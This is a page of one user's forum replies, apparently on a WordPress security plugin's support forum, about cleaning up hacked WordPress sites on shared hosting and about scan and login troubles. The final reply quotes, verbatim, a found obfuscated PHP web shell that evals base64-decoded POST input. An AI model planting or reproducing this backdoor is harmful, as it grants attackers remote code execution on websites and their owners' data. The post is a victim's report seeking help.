GreywolfComputer
Forum Replies Created
-
I can’t get the console to open on the page. I can only get it to open on the “Verify Java” screen that is at java.com. I’ve tried with 2 different computers on 2 different versions of windows/java/web browsers. And on different websites.
And only the IPs I’ve blocked the last couple of days show in the list.
Still not working. I get email alerts to attempted logins/lockouts, but only see my own activity in “all hits” tab and my own administrative logins in logins/logouts tab. Nothing else shows.
The scans work, just not the live activity view. I disabled the plugin, deleted it, then FTP’d the files and activated it again. Will see what happens.
I don’t remember. I don’t think so.
I’m going to work on that. And, I think, move some wordpress installs to renamed folders just in case.
Here is something interesting. In checking the WordFence Live Traffic and setting up blocks, etc. I see that one of the domains — a wordpress install I currently have with a homepage with a “coming soon” type message — is getting attempts from Russia to access files in actual directories in my hosting account; but which don’t reside under the domain/wordpress folder for that domain. Ex: http://www.mydomain.com/folder-that-holds-wordpress-folder-for-other-domain/wp-includes/user.php That would tell me someone saw the folders on the hosting account. The chance they saw MY ftp credentials is almost nil because I am the only one who uses it, has access to the password, and I use VERY secure passwords from a password generator/management program.
I’ve been checking a couple times a day on every site and I don’t see anything. WordFence says I’m clean. As does Sucuri. Also, other web scans from the outside. So, I’m going to cautiously say yes.
It’s shared with other customers. I suspected cross contamination because I couldn’t find a site at first that appeared to be actively infected; AND because I noticed some server issues around the time of these files being written. When I called them about the connection issues, they stated that they were having issues with the server. But, it’s possible that one of my sites were actively infected. The part that made me think not was that the random files it appeared to want to load were not present anywhere in my hosting accounts.
The FileZilla issue (changing ascii files and playing havoc with my comparison utilities) was apparently caused during an update in which the setting for doing all transfers binary was switched to “auto”. I always treated all files as binary. It makes for easier comparisons of text files.
The files changing is something FileZilla is doing. I FTP’d the files via webbrowser and via the file manager at Godaddy and they don’t change.
OK. Was able to get in. One more question, please.
I have checked and double-checked these wordpress sites on this server I had the problem on. I have used several external scanners like Sucuri and I have Wordfence scanned them. During my repair, I FTP’d the newest WordPress 4.0 zip contents to every wordpress install to make sure the core files were original.
In trying to be thorough, I have been looking at files and locations exploits use. I noticed something which might explain some issues I’ve had with file comparisons. But, I didn’t notice the pattern until this morning. I don’t know if it’s a program glitch or an exploit of some kind.
I noticed that the original wordpress file /includes/wp-db.php and the same file in the suspected hacked site folders on my computer are 2k difference in size. I checked the FTP server location against the original WordPress file and the files are the same size. If I download the wp-db.php file again, it also changes to 2k difference in size.
In comparing the files, any file I download from the FTP server compares identical via “text” or “ascii” compare. They show the same way in my text editor, too. But, CRC or Binary compare show them as different. In HEX compare view, there is an extra 0D or . character as the first character on every line.
If I upload the original wordpress file and immediately download it back to my computer, this change happens. Any ideas?
I will try now.
So… after many hours of searching through files, I found that the files were spread through all the folders of all websites on the server that is a shared environment from Godaddy. I removed or repaired all the files. Then ran Wordfence on all the wordpress sites. It now shows all of the sites clean.
Tim, I purchased 6 licenses — 3 in the first batch, 3 in the second, and was going about putting them in when I had been timed out of the wordfence login. So, I went to log in again and couldn’t. In my exhaustion, I don’t remember the password I used or even if I set one. I put in the email in “forgot” and I don’t receive any email to reset it. I sent you an email about this Thursday and didn’t receive a response.
I can’t log in to get my other 4 keys to finish the other sites.
I am liking WordFence. But, I am seeing some “connection reset” issues. I don’t know if they are something on the server or something Wordfence is doing. I don’t remember getting those errors before, but that doesn’t mean I wasn’t.
Okay, I found more files with the same lines in them and I found about 3 files in odd locations with the following code in them:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n95e668'];if(isset($s22)){eval($s21($s22));}?>Another thing I should mention is that all of these files contain ONLY the line of code. Nothing else. I searched the database for the strings that are in the “post” line and for anything that could be loading and I don’t see anything.